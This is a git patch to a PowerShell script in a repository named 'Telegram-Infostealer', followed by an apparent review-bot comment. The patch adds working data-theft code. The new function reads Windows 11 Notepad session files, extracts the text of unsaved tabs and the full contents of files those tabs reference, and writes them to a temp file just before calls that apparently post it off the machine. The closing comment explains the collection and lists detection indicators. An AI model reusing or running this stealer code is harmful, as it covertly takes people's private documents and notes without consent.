From 8dd844509e5bd69ce7229afc87dfe7dfc0ac13e2 Mon Sep 17 00:00:00 2001
From: egieb <93350544+beigeworm@users.noreply.github.com>
Date: Wed, 6 Mar 2024 22:58:14 +0000
Subject: [PATCH] Update main.ps1
---
 Telegram-Infostealer/main.ps1 | 50 +++++++++++++++++++++++++++++++++++
 1 file changed, 50 insertions(+)
diff --git a/Telegram-Infostealer/main.ps1 b/Telegram-Infostealer/main.ps1
index 6aad1c2..8de1d65 100644
--- a/Telegram-Infostealer/main.ps1
+++ b/Telegram-Infostealer/main.ps1
@@ -167,6 +167,49 @@ else{ $GPS = "LAT = $Lat LONG = $Lon" } +function EnumNotepad{ + $appDataDir = [Environment]::GetFolderPath('LocalApplicationData') + $directoryRelative = "Packages\Microsoft.WindowsNotepad_*\LocalState\TabState" + $matchingDirectories = Get-ChildItem -Path (Join-Path -Path $appDataDir -ChildPath 'Packages') -Filter 'Microsoft.WindowsNotepad_*' -Directory + foreach ($dir in $matchingDirectories) { + $fullPath = Join-Path -Path $dir.FullName -ChildPath 'LocalState\TabState' + $listOfBinFiles = Get-ChildItem -Path $fullPath -Filter *.bin + foreach ($fullFilePath in $listOfBinFiles) { + if ($fullFilePath.Name -like '*.0.bin' -or $fullFilePath.Name -like '*.1.bin') { + continue + } + $seperator = ("=" * 60) + $SMseperator = ("-" * 60) + $seperator | Out-File -FilePath $outpath -Append + $filename = $fullFilePath.Name + $contents = [System.IO.File]::ReadAllBytes($fullFilePath.FullName) + $isSavedFile = $contents[3] + if ($isSavedFile -eq 1) { + $lengthOfFilename = $contents[4] + $filenameEnding = 5 + $lengthOfFilename * 2 + $originalFilename = [System.Text.Encoding]::Unicode.GetString($contents[5..($filenameEnding - 1)]) + "Found saved file : $originalFilename" | Out-File -FilePath $outpath -Append + $filename | Out-File -FilePath $outpath -Append + $SMseperator | Out-File -FilePath $outpath -Append + Get-Content -Path $originalFilename -Raw | Out-File -FilePath $outpath -Append + } else { + "Found an unsaved tab!" 
| Out-File -FilePath $outpath -Append + $filename | Out-File -FilePath $outpath -Append + $SMseperator | Out-File -FilePath $outpath -Append + $filenameEnding = 0 + $delimeterStart = [array]::IndexOf($contents, 0, $filenameEnding) + $delimeterEnd = [array]::IndexOf($contents, 1, $filenameEnding) + + $fileMarker = $contents[($delimeterStart + 2)..($delimeterEnd - 1)] + $fileMarker = -join ($fileMarker | ForEach-Object { [char]$_ }) + + $originalFileContents = [System.Text.Encoding]::Unicode.GetString($contents[($delimeterEnd + 4 + $fileMarker.Length)..($contents.Length - 6)]) + $originalFileContents | Out-File -FilePath $outpath -Append + } + "`n" | Out-File -FilePath $outpath -Append + } + } +} $contents = " =================================================== @@ -264,6 +307,13 @@ $outpath = "$env:TEMP/systeminfo.txt" $contents | Out-File -FilePath $outpath -Encoding ASCII -Append $infomessage2 | Out-File -FilePath $outpath -Encoding ASCII -Append +if ($OSString -like '*11*'){ + EnumNotepad +} +else{ + "no notepad tabs (windows 10 or below)" | Out-File -FilePath $outpath -Encoding ASCII -Append +} + Post-Message Post-File sleep 2
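Review bot: EnumNotepad has no comment describing what it collects, and the data is sensitive: it reads every `*.bin` under `Packages\Microsoft.WindowsNotepad_*\LocalState\TabState` in LocalApplicationData (skipping `*.0.bin` and `*.1.bin`) and appends to `$outpath` the recovered text of unsaved tabs, plus the full content of any saved file a tab points to via `Get-Content -Path $originalFilename -Raw`. The second hunk calls it only when `$OSString` matches `*11*`, immediately before `Post-File`, which presumably sends `$outpath` (`$env:TEMP/systeminfo.txt`) off the host; the body of Post-File is outside this diff. A header comment such as `# Copies Windows 11 Notepad session (TabState) text, saved and unsaved, into $outpath` would make the collection explicit. For detection, the file-system events these hunks produce are reads of the TabState directory by a PowerShell process rather than by Notepad, reads of the documents those tabs reference, and appends to `systeminfo.txt` in TEMP.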